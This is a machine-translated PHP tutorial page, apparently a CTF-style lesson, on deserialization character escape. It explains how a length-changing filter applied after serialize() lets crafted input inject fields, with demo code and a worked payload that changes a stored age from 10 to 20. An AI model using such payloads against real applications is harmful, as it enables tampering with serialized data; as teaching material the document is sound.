Home >Backend Development >PHP Tutorial >PHP deserialization detailed analysis of character escape
This article brings you relevant knowledge about PHP, which mainly introduces the related issues about deserialization character escape. The string after PHP serialization has been replaced or modified, resulting in When the string length changes, it is always serialized first and then replaced and modified. Let's take a look at it together. I hope it will be helpful to everyone.
Recommended study: "PHP Video Tutorial"
Essence: Closed
Category: More characters, fewer characters
Common points:
<?php function filter($string){ $filter = '/p/i'; return preg_replace($filter,'WW',$string); } $username = 'purplet'; $age = "10"; $user = array($username,$age); var_dump(serialize($user)); echo "<pre class="brush:php;toolbar:false">"; $r = filter(serialize($user)); var_dump($r); var_dump(unserialize($r)); ?>
The following part can be recorded as a template, output it first when doing the question
var_dump(serialize($user)); # 序列化 echo "<pre class="brush:php;toolbar:false">"; $r = filter(serialize($user)); # 替换后序列化 var_dump($r); var_dump(unserialize($r)); # 打印反序列化
It can be observed that each substitution changes p to ww, that is, one more character is added each time
This leads to length allocation read errors and output errors during deserialization
Therefore, consider constructing character escape through the nature of its length reading
To change 10 to 20, first determine the string to be constructed later:
原字符串:";i:1;s:2:"10";} 目标子串:";i:1;s:2:"20";}
Determine the length: 16 (that is, pass in The string needs 16 more characters to put these characters into the next attribute)
Each time there is 1 more character, so 16 p
is needed, so pass in:
Result output:
Value filtering, the first value includes the last key and value (up to the left bracket)
<?php function filter($string){ $filter = '/pp/i'; return preg_replace($filter,'W',$string); } $username = "ppurlet" $age = "10"; $user = array($username,$age); var_dump (serialize($user)); # 序列化 echo "<pre class="brush:php;toolbar:false">"; $r = filter(serialize($user)); # 替换后序列化 var_dump ($r); var_dump (unserialize($r)); # 打印反序列 ?>
is similar to the above code, except that 2 p's are replaced by one w, and the characters are reduced by
If the same value does not correspond, deserialization will fail
username: code required to construct escape
age: construct escape code
A Followed by the incoming age string, calculate the construction length
, which is to occupy these 13 characters
Every 2 p's become 1 w, which is equivalent to escaping one bit. Therefore, enter 13*2=26 p, the character length identifier is 26, which becomes 13 w, and the next 13 characters account for the remaining 13 bits
payload:
username='pppppppppppppppppppppppppp' age=A";i:1;s:2:"20";}
The above is the detailed content of PHP deserialization detailed analysis of character escape. For more information, please follow other related articles on the PHP Chinese website!